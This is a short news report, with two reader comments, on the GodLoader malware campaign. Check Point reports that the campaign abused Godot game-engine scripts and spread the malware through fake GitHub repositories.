Hackers have used new GodLoader malware exploiting the capabilities of the widely used Godot game engine to evade detection and infect over 17,000 systems in just three months.
As Check Point Research found while investigating the attacks, threat actors can use this malware loader to target gamers across all major platforms, including Windows, macOS, Linux, Android, and iOS.
It's also used to leverage Godot's flexibility and its GDScript scripting language capabilities to execute arbitrary code and bypass detection systems using the game engine .pck files, which package game assets, to embed harmful scripts.
The attackers delivered the GodLoader malware through the Stargazers Ghost Network, a malware Distribution-as-a-Service (DaaS) that masks its activities using seemingly legitimate GitHub repositories.
Between September and October 2024, they used over 200 repositories controlled by over 225 Stargazer Ghost accounts to deploy the malware to targets' systems, exploiting potential victims' trust in open-source platforms and seemingly legitimate software repositories.
Throughout the campaign, Check Point detected four separate attack waves against developers and gamers between September 12 and October 3, enticing them to download infected tools and games.
Script kiddies. Not much has changed in the past 20 years, since people used Game Maker as a toolkit for building malware.
This is actually interesting in that one doesn't tend to think of game-engine scripts as being a threat vector. Most talk of scripting threats is in a corporate context where they wouldn't have such software so it's you know common stuff like cmdlets, powershell, python, C#, stuff like that and locking that down in high security environments is common. So it's a bit clever in that.
